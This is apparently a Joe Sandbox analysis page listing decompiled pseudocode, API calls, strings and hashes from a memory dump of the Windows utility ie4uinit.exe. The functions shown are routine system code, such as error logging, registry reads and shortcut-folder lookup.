			E00007FF77FF7319C7268(long long __rbx, intOrPtr* __rcx, signed int __rdx, intOrPtr* __r8, long long _a32) {
				signed int _v56;
				char _v568;
				long long _v576;
				long long _v584;
				long _v592;
				long long _v600;
				void* _t41;
				void* _t42;
				long _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				intOrPtr _t55;
				void* _t64;
				intOrPtr _t66;
				signed long long _t78;
				intOrPtr _t80;
				long long _t82;
				long long _t95;
				void* _t118;
				intOrPtr _t139;
				long long _t141;

				_a32 = __rbx;
				_t78 =  *0x319f4658; // 0x8be7dd1f02a
				_v56 = _t78 ^ _t118 - 0x00000250;
				r15d = 0;
				if (__rdx == 0) goto 0x319c749f;
				if (__rcx == 0) goto 0x319c749f;
				_t80 =  *0x319f4dd8; // 0x0
				 *__rcx = r15w;
				if (_t80 == 0) goto 0x319c72dd;
				_t64 =  *0x319f4df0 - r15b; // 0x0
				if (_t64 == 0) goto 0x319c72dd;
				 *0x319e7038();
				if ( *__rcx != r15w) goto 0x319c749f;
				_t55 =  *__r8;
				_t66 = _t55;
				if (_t66 == 0) goto 0x319c7314;
				if (_t66 == 0) goto 0x319c730b;
				if (_t66 == 0) goto 0x319c7302;
				if (_t55 != 1) goto 0x319c731b;
				goto 0x319c731b;
				goto 0x319c731b;
				goto 0x319c731b;
				r8d =  *((intOrPtr*)(__r8 + 4));
				_v584 = _t141;
				r9d = 0x400;
				_v592 = 0x100;
				_v600 =  &_v568;
				_v568 = r15w;
				FormatMessageW(??, ??, ??, ??, ??, ??, ??);
				_t110 = __rcx + __rdx * 2;
				_t82 =  *((intOrPtr*)(__r8 + 0x80));
				if ( *((intOrPtr*)(__r8 + 0x30)) == _t141) goto 0x319c738d;
				_v584 = _t82;
				_v592 =  *((intOrPtr*)(__r8 + 0x78));
				_v600 =  *((intOrPtr*)(__r8 + 0x38));
				_t41 = E00007FF77FF7319C71E8( *((intOrPtr*)(__r8 + 0x38)), __rcx, __rcx + __rdx * 2, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(__r8 + 0x30)));
				goto 0x319c739e;
				_v600 = _t82;
				_t42 = E00007FF77FF7319C71E8(_t41, __rcx, _t110, L"%hs!%p: ",  *((intOrPtr*)(__r8 + 0x30)));
				if ( *((intOrPtr*)(__r8 + 0x88)) == 0) goto 0x319c73c2;
				E00007FF77FF7319C71E8(_t42, _t82, _t110, L"(caller: %p) ",  *((intOrPtr*)(__r8 + 0x88)));
				_t44 = GetCurrentThreadId();
				_v576 =  &_v568;
				_v584 =  *((intOrPtr*)(__r8 + 4));
				_v592 = _t44;
				_v600 =  *((intOrPtr*)(__r8 + 0x3c));
				_t46 = E00007FF77FF7319C71E8( *((intOrPtr*)(__r8 + 0x3c)), _t82, _t110, L"%hs(%d) tid(%x) %08X %ws", "Exception");
				if ( *((intOrPtr*)(__r8 + 0x10)) != _t141) goto 0x319c740f;
				if ( *((intOrPtr*)(__r8 + 0x40)) != _t141) goto 0x319c740f;
				if ( *((intOrPtr*)(__r8 + 0x28)) == _t141) goto 0x319c749f;
				_t47 = E00007FF77FF7319C71E8(_t46, _t82, _t110, L"    ", "Exception");
				if ( *((intOrPtr*)(__r8 + 0x10)) == 0) goto 0x319c743c;
				_t48 = E00007FF77FF7319C71E8(_t47, _t82, _t110, L"Msg:[%ws] ",  *((intOrPtr*)(__r8 + 0x10)));
				if ( *((intOrPtr*)(__r8 + 0x40)) == 0) goto 0x319c7457;
				_t49 = E00007FF77FF7319C71E8(_t48, _t82, _t110, L"CallContext:[%hs] ",  *((intOrPtr*)(__r8 + 0x40)));
				_t95 =  *((intOrPtr*)(__r8 + 0x20));
				_t139 =  *((intOrPtr*)(__r8 + 0x28));
				if (_t95 == 0) goto 0x319c747d;
				_v600 = _t95;
				_t50 = E00007FF77FF7319C71E8(_t49, _t82, _t110, L"[%hs(%hs)]\n", _t139);
				goto 0x319c749f;
				if (_t139 == 0) goto 0x319c7493;
				_t51 = E00007FF77FF7319C71E8(_t50, _t82, _t110, L"[%hs]\n", _t139);
				goto 0x319c749f;
				E00007FF77FF7319C71E8(_t51, _t82, _t110, "\n", _t139);
				return E00007FF77FF7319E38D0(0,  *((intOrPtr*)(__r8 + 4)), _v56 ^ _t118 - 0x00000250);
			}

0x7ff7319c7268
0x7ff7319c727b
0x7ff7319c7285
0x7ff7319c728d
0x7ff7319c729c
0x7ff7319c72a5
0x7ff7319c72ab
0x7ff7319c72b2
0x7ff7319c72b9
0x7ff7319c72bb
0x7ff7319c72c2
0x7ff7319c72cd
0x7ff7319c72d7
0x7ff7319c72dd
0x7ff7319c72e6
0x7ff7319c72e8
0x7ff7319c72ed
0x7ff7319c72f2
0x7ff7319c72f7
0x7ff7319c7300
0x7ff7319c7309
0x7ff7319c7312
0x7ff7319c731b
0x7ff7319c7324
0x7ff7319c7329
0x7ff7319c732f
0x7ff7319c733e
0x7ff7319c7343
0x7ff7319c7349
0x7ff7319c734f
0x7ff7319c7353
0x7ff7319c7368
0x7ff7319c736a
0x7ff7319c7379
0x7ff7319c7382
0x7ff7319c7386
0x7ff7319c738b
0x7ff7319c7394
0x7ff7319c7399
0x7ff7319c73ab
0x7ff7319c73ba
0x7ff7319c73c2
0x7ff7319c73d0
0x7ff7319c73e2
0x7ff7319c73e9
0x7ff7319c73f0
0x7ff7319c73f4
0x7ff7319c73fd
0x7ff7319c7403
0x7ff7319c7409
0x7ff7319c741c
0x7ff7319c7428
0x7ff7319c7437
0x7ff7319c7443
0x7ff7319c7452
0x7ff7319c7457
0x7ff7319c745e
0x7ff7319c7465
0x7ff7319c7467
0x7ff7319c7476
0x7ff7319c747b
0x7ff7319c7483
0x7ff7319c748c
0x7ff7319c7491
0x7ff7319c749a
0x7ff7319c74c7

APIs

FormatMessageW.KERNEL32 ref: 00007FF7319C7349
GetCurrentThreadId.KERNEL32 ref: 00007FF7319C73C2

Part of subcall function 00007FF7319C71E8: _vsnwprintf.MSVCRT ref: 00007FF7319C7220

Strings

FailFast, xrefs: 00007FF7319C72F9
[%hs(%hs)], xrefs: 00007FF7319C746C
(caller: %p) , xrefs: 00007FF7319C73AD
%hs!%p: , xrefs: 00007FF7319C738D
LogHr, xrefs: 00007FF7319C7302
ReturnHr, xrefs: 00007FF7319C730B
Msg:[%ws] , xrefs: 00007FF7319C742A
CallContext:[%hs] , xrefs: 00007FF7319C7445
, xrefs: 00007FF7319C740F
[%hs], xrefs: 00007FF7319C7485
%hs(%d)\%hs!%p: , xrefs: 00007FF7319C736F
%hs(%d) tid(%x) %08X %ws, xrefs: 00007FF7319C73D5
Exception, xrefs: 00007FF7319C7314

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CurrentFormatMessageThread_vsnwprintf
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 223436642-2849347638
Opcode ID: 54ef88921a4e0465f85e18d127ba9794366c6ffde68417d12abea57b28f0224c
Instruction ID: c0494093fab5e9f247e6f281335fcae6013119e147a583927a41c5e673820f76
Opcode Fuzzy Hash: 54ef88921a4e0465f85e18d127ba9794366c6ffde68417d12abea57b28f0224c
Instruction Fuzzy Hash: 73614EA1E0D682A1EB18EF51A8045B9E3A5BF44B8CFC45136DA8D137ACDF7CE540DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DBB7C Relevance: 25.8, APIs: 17, Instructions: 286fileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32 ref: 00007FF7319DBCB7
GetLastError.KERNEL32 ref: 00007FF7319DBCC1
GetLastError.KERNEL32 ref: 00007FF7319DBCD4
SetFilePointer.KERNEL32 ref: 00007FF7319DBD12
GetLastError.KERNEL32 ref: 00007FF7319DBD1D
GetLastError.KERNEL32 ref: 00007FF7319DBD2C
GetLastError.KERNEL32 ref: 00007FF7319DBD39
SetEndOfFile.KERNEL32 ref: 00007FF7319DBD5D
GetLastError.KERNEL32 ref: 00007FF7319DBD67
GetLastError.KERNEL32 ref: 00007FF7319DBD76
GetLastError.KERNEL32 ref: 00007FF7319DBD83
FlushFileBuffers.KERNEL32 ref: 00007FF7319DBDAF
CreateFileMappingW.KERNEL32 ref: 00007FF7319DBDE5
#50.IERTUTIL ref: 00007FF7319DBDFE
MapViewOfFile.KERNEL32 ref: 00007FF7319DBE30
memset.MSVCRT ref: 00007FF7319DBE4E
GetLastError.KERNEL32 ref: 00007FF7319DBF83

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$File$BuffersCreateFlushMappingPointerSizeViewmemset
String ID:
API String ID: 804094210-0
Opcode ID: 2ff7b0256f059532388c2e18e71e07a70d5519942173f3ce971e031d846027c7
Instruction ID: bbbcf9c893ee6b465569ae2c5e2381cdb60963799ecc947e90afd56b97b6ae83
Opcode Fuzzy Hash: 2ff7b0256f059532388c2e18e71e07a70d5519942173f3ce971e031d846027c7
Instruction Fuzzy Hash: 18C1C2B2F087C296EB50AF25E488769B7E4FB44758F904138DA4D83758DFBDD401AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D1464 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 194COMMON

Download Yara Rule

APIs

StrCmpNIW.SHLWAPI ref: 00007FF7319D1503
wcsncpy_s.MSVCRT ref: 00007FF7319D1630
UrlUnescapeW.SHLWAPI ref: 00007FF7319D1649
SysFreeString.OLEAUT32 ref: 00007FF7319D168B
StrCmpNIW.SHLWAPI ref: 00007FF7319D16B1
StrStrIW.SHLWAPI ref: 00007FF7319D16C4
SysFreeString.OLEAUT32 ref: 00007FF7319D1714
SysFreeString.OLEAUT32 ref: 00007FF7319D171F

Part of subcall function 00007FF7319D4EB4: CreateIUriBuilder.URLMON(?,00000000,?,00007FF7319D170F), ref: 00007FF7319D4F1B
Part of subcall function 00007FF7319D4EB4: UrlEscapeW.SHLWAPI(?,00000000,?,00007FF7319D170F), ref: 00007FF7319D4F46

Strings

msn., xrefs: 00007FF7319D14A8
EUPP, xrefs: 00007FF7319D16CF
bing., xrefs: 00007FF7319D14BE
EUPP_, xrefs: 00007FF7319D16A7
%s_%s, xrefs: 00007FF7319D16DB
_EUPP_, xrefs: 00007FF7319D16BA

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FreeString$BuilderCreateEscapeUnescapewcsncpy_s
String ID: %s_%s$EUPP$EUPP_$_EUPP_$bing.$msn.
API String ID: 1570689176-4073838992
Opcode ID: 0c2213bee666b21428313772bd6865f15e2349cbc810c6156c9bb1336e9ba057
Instruction ID: d3554d896d68cfb9404e2dfe2dfbb4bbd6cc255ae08648091e1be5aeddc7289e
Opcode Fuzzy Hash: 0c2213bee666b21428313772bd6865f15e2349cbc810c6156c9bb1336e9ba057
Instruction Fuzzy Hash: 4F81B537E1CBC1A2EB10EB15E44416AA7A0FB84B98F845135EE4D47BA8DFBCE441D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D1154 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 135registrymemoryCOMMON

Download Yara Rule

APIs

#57.IERTUTIL ref: 00007FF7319D11A4
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7319D11CA
SysAllocString.OLEAUT32 ref: 00007FF7319D11F0
RegOpenKeyExW.ADVAPI32 ref: 00007FF7319D122D
RegGetValueW.ADVAPI32 ref: 00007FF7319D126B
RegCloseKey.ADVAPI32 ref: 00007FF7319D1293

Part of subcall function 00007FF7319C1440: SysStringLen.OLEAUT32 ref: 00007FF7319C148B

SysStringLen.OLEAUT32 ref: 00007FF7319D12C9
memcpy_s.MSVCRT ref: 00007FF7319D12EE
SysFreeString.OLEAUT32 ref: 00007FF7319D1315
LocalFree.KERNEL32 ref: 00007FF7319D1327
LocalFree.KERNEL32 ref: 00007FF7319D1337

Strings

N/A, xrefs: 00007FF7319D129E
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FF7319D121F
MachineGuid, xrefs: 00007FF7319D125D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$Local$AllocCloseConvertOpenValuememcpy_s
String ID: MachineGuid$N/A$SOFTWARE\Microsoft\Cryptography
API String ID: 914379026-238228221
Opcode ID: bae0a7e27a1d84dd16728a17bb357d8d9e57442cf4e0cf5843a0564b6db68750
Instruction ID: 272f0571a76c684fd29d0bee8bf8a328f277bd3bae3d26c533d9538f4c653337
Opcode Fuzzy Hash: bae0a7e27a1d84dd16728a17bb357d8d9e57442cf4e0cf5843a0564b6db68750
Instruction Fuzzy Hash: 19516033A08B82A2EB10EF11E84456AF3A4FB84798F944035DE8D47B58DFBDD445E720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C9818 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 109memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObjectEx.KERNEL32 ref: 00007FF7319C983C
GetLastError.KERNEL32 ref: 00007FF7319C9877
CloseHandle.KERNEL32 ref: 00007FF7319C9882
SetLastError.KERNEL32 ref: 00007FF7319C9892
GetLastError.KERNEL32 ref: 00007FF7319C98A6
CloseHandle.KERNEL32 ref: 00007FF7319C98B1
SetLastError.KERNEL32 ref: 00007FF7319C98C1
GetLastError.KERNEL32 ref: 00007FF7319C98D1
ReleaseMutex.KERNEL32 ref: 00007FF7319C98DC
SetLastError.KERNEL32 ref: 00007FF7319C98EC
GetProcessHeap.KERNEL32 ref: 00007FF7319C991D
HeapFree.KERNEL32 ref: 00007FF7319C992B
ReleaseMutex.KERNEL32 ref: 00007FF7319C9939

Strings

internal\sdk\inc\wil\resource.h, xrefs: 00007FF7319C97F3, 00007FF7319C995D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CloseHandleHeapMutexRelease$FreeObjectProcessSingleWait
String ID: internal\sdk\inc\wil\resource.h
API String ID: 1242941757-3958217256
Opcode ID: 25bb7fe6154c03916b88fc9ca83f663245538ad64c785a864ca1a9a5c79f9f2a
Instruction ID: befffc05bf56e1918285fece5d9ef0195979a7e61b85eada072b7fee9d1dcd67
Opcode Fuzzy Hash: 25bb7fe6154c03916b88fc9ca83f663245538ad64c785a864ca1a9a5c79f9f2a
Instruction Fuzzy Hash: 4341A821E0C683A2FB54BB61D444379A3A4BF44B98F984434CACE4369DDFACE451D771

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CAE3C Relevance: 22.6, APIs: 15, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

GetKernelObjectSecurity.ADVAPI32 ref: 00007FF7319CAE6E
GetLastError.KERNEL32 ref: 00007FF7319CAE7E
LocalAlloc.KERNEL32 ref: 00007FF7319CAE8F
GetKernelObjectSecurity.ADVAPI32 ref: 00007FF7319CAEBE
GetLastError.KERNEL32 ref: 00007FF7319CAEC8
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF7319CAF04
GetAce.ADVAPI32 ref: 00007FF7319CAF2A
GetLengthSid.ADVAPI32 ref: 00007FF7319CAF54
LocalAlloc.KERNEL32 ref: 00007FF7319CAF61
GetLengthSid.ADVAPI32 ref: 00007FF7319CAF77
CopySid.ADVAPI32 ref: 00007FF7319CAF85
LocalFree.KERNEL32 ref: 00007FF7319CAF97
LocalFree.KERNEL32 ref: 00007FF7319CAFD8

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Local$Security$AllocErrorFreeKernelLastLengthObject$CopyDescriptorSacl
String ID:
API String ID: 3500360645-0
Opcode ID: f484e11bb68007c79833053dbf434390e9548860d72040c734a544c6a9387fbd
Instruction ID: 7a36f8024d2fc546011c0ab2817ac14972cab5467d5451f5bf0a0a9d821d1513
Opcode Fuzzy Hash: f484e11bb68007c79833053dbf434390e9548860d72040c734a544c6a9387fbd
Instruction Fuzzy Hash: 1C518161F08683A6FB51AF61D8443B9A3A1AF04B9CF808030DD8D4668CEFBCE405E770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C955C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 113synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreExW.KERNEL32(?,00007FF7319C827C), ref: 00007FF7319C9586
GetLastError.KERNEL32(?,00007FF7319C827C), ref: 00007FF7319C959C
CloseHandle.KERNEL32(?,00007FF7319C827C), ref: 00007FF7319C95A7
SetLastError.KERNEL32(?,00007FF7319C827C), ref: 00007FF7319C95B3
GetCurrentProcessId.KERNEL32 ref: 00007FF7319C963A
CreateMutexExW.KERNEL32 ref: 00007FF7319C9676
CloseHandle.KERNEL32 ref: 00007FF7319C969C

Strings

internal\sdk\inc\wil\resultmacros.h, xrefs: 00007FF7319C95C3
wil, xrefs: 00007FF7319C9AFE
Local\SM0:%d:%d:%hs, xrefs: 00007FF7319C9645
internal\sdk\inc\wil\resource.h, xrefs: 00007FF7319C97F3
x, xrefs: 00007FF7319C964F

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$CurrentMutexProcessSemaphore
String ID: Local\SM0:%d:%d:%hs$internal\sdk\inc\wil\resource.h$internal\sdk\inc\wil\resultmacros.h$wil$x
API String ID: 656119268-2631734413
Opcode ID: f0a4cdb5c4464e01f5c2d47df41c277b7c8a3f2683eb1d8c4202df3bcb8790b5
Instruction ID: e914fcd992433a685c23d680bae91cfcafe4a6167997c35881fa0694e3c1f315
Opcode Fuzzy Hash: f0a4cdb5c4464e01f5c2d47df41c277b7c8a3f2683eb1d8c4202df3bcb8790b5
Instruction Fuzzy Hash: BA41C532F09AC196E710AF51E8403A9A3A0FB88B98F944435DECD47B59DEBCD441DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C458C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00007FF77FF7319C458C(void* __eax, long long __rbx, void* __r9) {
				void* _t38;
				int _t40;
				void* _t55;
				signed long long _t65;
				void* _t90;
				long _t91;
				void* _t92;
				void* _t94;
				signed long long _t95;
				void* _t102;
				void* _t103;
				void* _t104;

				_t102 = __r9;
				_t69 = __rbx;
				 *((long long*)(_t94 + 8)) = __rbx;
				_t2 = _t94 - 0x580; // -1438
				_t92 = _t2;
				_t95 = _t94 - 0x680;
				_t65 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t92 + 0x570) = _t65 ^ _t95;
				r9d = 0;
				_t5 = _t102 + 0x10; // 0x10
				r8d = _t5;
				__imp__SHGetSpecialFolderPathW();
				if (__eax == 0) goto 0x319c464c;
				if (GetCurrentDirectoryW(_t91) == 0) goto 0x319c45f3;
				_t7 = _t92 + 0x150; // -1102
				_t8 = _t95 + 0x40; // 0x22
				E00007FF77FF7319C44E4(__rbx, _t8, _t7, _t90);
				GetModuleHandleW(??);
				r9d = 0x104;
				if (LoadStringW(??, ??, ??, ??) == 0) goto 0x319c464c;
				_t10 = _t92 + 0x360; // -574
				_t11 = _t95 + 0x40; // 0x22
				E00007FF77FF7319C9348(_t55, _t65 ^ _t95, _t69, _t11, _t7, _t90, _t10, _t104);
				if (GetCurrentDirectoryW(??, ??) == 0) goto 0x319c464c;
				_t13 = _t92 + 0x150; // -1102
				_t14 = _t95 + 0x40; // 0x22
				_t38 = E00007FF77FF7319C44E4(_t69, _t14, _t13, _t90);
				_t15 = _t95 + 0x30; // 0x12
				 *((intOrPtr*)(_t95 + 0x30)) = 0x208;
				 *((long long*)(_t95 + 0x28)) = _t15;
				_t18 = _t95 + 0x34; // 0x16
				_t103 = _t18;
				_t19 = _t92 + 0x360; // -574
				 *((long long*)(_t95 + 0x20)) = _t19;
				__imp__SHGetValueW();
				if (_t38 == 0) goto 0x319c46b2;
				GetModuleHandleW(??);
				r9d = 0x104;
				_t40 = LoadStringW(??, ??, ??, ??);
				if (_t40 == 0) goto 0x319c46ff;
				r9d = 0;
				_t22 = _t95 + 0x40; // 0x22
				_t23 = _t103 + 2; // 0x2
				r8d = _t23;
				__imp__SHGetSpecialFolderPathW();
				if (_t40 == 0) goto 0x319c46ff;
				_t24 = _t92 + 0x360; // -574
				_t25 = _t95 + 0x40; // 0x22
				E00007FF77FF7319C9348(_t55, _t19, _t69, _t25, _t22, _t90, _t24, _t104);
				if (GetCurrentDirectoryW(??, ??) == 0) goto 0x319c46ff;
				_t27 = _t92 + 0x150; // -1102
				_t28 = _t95 + 0x40; // 0x22
				return E00007FF77FF7319E38D0(E00007FF77FF7319C44E4(_t69, _t28, _t27, _t90), 0x104,  *(_t92 + 0x570) ^ _t95);
			}

0x7ff7319c458c
0x7ff7319c458c
0x7ff7319c458c
0x7ff7319c4592
0x7ff7319c4592
0x7ff7319c459a
0x7ff7319c45a1
0x7ff7319c45ab
0x7ff7319c45b2
0x7ff7319c45bc
0x7ff7319c45bc
0x7ff7319c45c0
0x7ff7319c45cd
0x7ff7319c45e0
0x7ff7319c45e2
0x7ff7319c45e9
0x7ff7319c45ee
0x7ff7319c45f5
0x7ff7319c45fb
0x7ff7319c4615
0x7ff7319c4617
0x7ff7319c461e
0x7ff7319c4623
0x7ff7319c4639
0x7ff7319c463b
0x7ff7319c4642
0x7ff7319c4647
0x7ff7319c464c
0x7ff7319c4651
0x7ff7319c4659
0x7ff7319c465e
0x7ff7319c465e
0x7ff7319c4663
0x7ff7319c4678
0x7ff7319c4684
0x7ff7319c468c
0x7ff7319c4690
0x7ff7319c4696
0x7ff7319c46a8
0x7ff7319c46b0
0x7ff7319c46b2
0x7ff7319c46b5
0x7ff7319c46bc
0x7ff7319c46bc
0x7ff7319c46c0
0x7ff7319c46c8
0x7ff7319c46ca
0x7ff7319c46d1
0x7ff7319c46d6
0x7ff7319c46ec
0x7ff7319c46ee
0x7ff7319c46f5
0x7ff7319c471e

APIs

SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C45C0
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C45D8
GetModuleHandleW.KERNEL32 ref: 00007FF7319C45F5
LoadStringW.USER32 ref: 00007FF7319C460D
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C4631

Part of subcall function 00007FF7319C44E4: SetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C450E
Part of subcall function 00007FF7319C44E4: FindFirstFileW.KERNEL32 ref: 00007FF7319C4524
Part of subcall function 00007FF7319C44E4: FindNextFileW.KERNEL32 ref: 00007FF7319C4548
Part of subcall function 00007FF7319C44E4: FindClose.KERNEL32 ref: 00007FF7319C4555
Part of subcall function 00007FF7319C44E4: SetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C455E

SHGetValueW.SHLWAPI ref: 00007FF7319C4684
GetModuleHandleW.KERNEL32 ref: 00007FF7319C4690
LoadStringW.USER32 ref: 00007FF7319C46A8
SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C46C0
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C46E4

Strings

DesktopShortcutsFolderName, xrefs: 00007FF7319C4671
Software\Microsoft\Windows\CurrentVersion\OemStartMenuData, xrefs: 00007FF7319C467D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CurrentDirectory$Find$FileFolderHandleLoadModulePathSpecialString$CloseFirstNextValue
String ID: DesktopShortcutsFolderName$Software\Microsoft\Windows\CurrentVersion\OemStartMenuData
API String ID: 2124583704-3001445492
Opcode ID: 1b3faeb098a27806fa8076bed0409add7d04647c96a9845ece77223a3828a706
Instruction ID: 97801fb603f34be73d871edeb06cae7d922d8d45b565a8ae40f8822df482fbd0
Opcode Fuzzy Hash: 1b3faeb098a27806fa8076bed0409add7d04647c96a9845ece77223a3828a706
Instruction Fuzzy Hash: 7B411272B08AC2E5EB64AF60D8443EAA364FB44748FC05036D68E4769DDFBCD608D760

